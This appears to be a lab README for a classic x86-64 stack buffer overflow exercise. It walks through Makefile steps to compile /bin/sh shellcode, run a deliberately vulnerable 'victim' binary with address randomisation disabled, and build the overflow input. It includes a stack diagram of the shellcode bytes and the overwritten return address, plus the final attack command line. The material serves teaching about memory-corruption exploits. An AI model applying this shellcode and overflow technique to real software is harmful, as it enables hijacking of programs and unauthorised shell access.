This is based on <https://crypto.stanford.edu/~blynn/rop/>, the
Makefile automates most of this. This has been tested on Debian 10.3
running kernel 4.19.0-8-amd64 and using gcc (Debian 8.3.0-6) 8.3.0.

1. Compile and test the shellcode

   make shellcode

2. Find the start and length of the shellcode

   make shellcode.hex

3. Compile and run the victim code

   make victim
   setarch $(arch) -R ./victim

4. Grab the address where the buffer is located on the stack and
   update the Makefile if necessary

5. Create the attack input

   make attack.bin

                     +----------------+
   0x0007fffffffe418 | return address |   d0e3 ffff ff7f 0000  ---+
                     |----------------|                           |
   0x0007fffffffe410 | saved rbp      |   0000 0000 0000 0000	  |
                     |----------------|                           |
   0x0007fffffffe408 |                |   0000 0000 0000 0000	  |
   0x0007fffffffe400 |                |   0000 0000 0000 0000	  |
   0x0007fffffffe3f8 |                |   0000 0000 0000 0000	  |
   0x0007fffffffe3f0 |                |   0000 0000 0000 0000	  |
   0x0007fffffffe3e8 | char name[64]  |   6e2f 7368 00ef bead	  |
   0x0007fffffffe3e0 |                |   e8ed ffff ff2f 6269	  |
   0x0007fffffffe3d8 |                |   4831 f648 31d2 0f05	  |
   0x0007fffffffe3d0 |                |   eb0e 5f48 31c0 b03b  <--|
                     |----------------|

   The shellcode takes up the first 32 bytes of the buffer. The 80
   zeroes in the printf represent 40 zero bytes, 32 of which fill the
   rest of the buffer, and the remaining 8 overwrite the saved
   location of the RBP register. The next 8 overwrite the return
   address, and point to the beginning of the buffer where our
   shellcode lies.

6. Run the attack

   make attack

   ( ( cat shellcode.hex ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) \
     | setarch $(arch) -R ./victim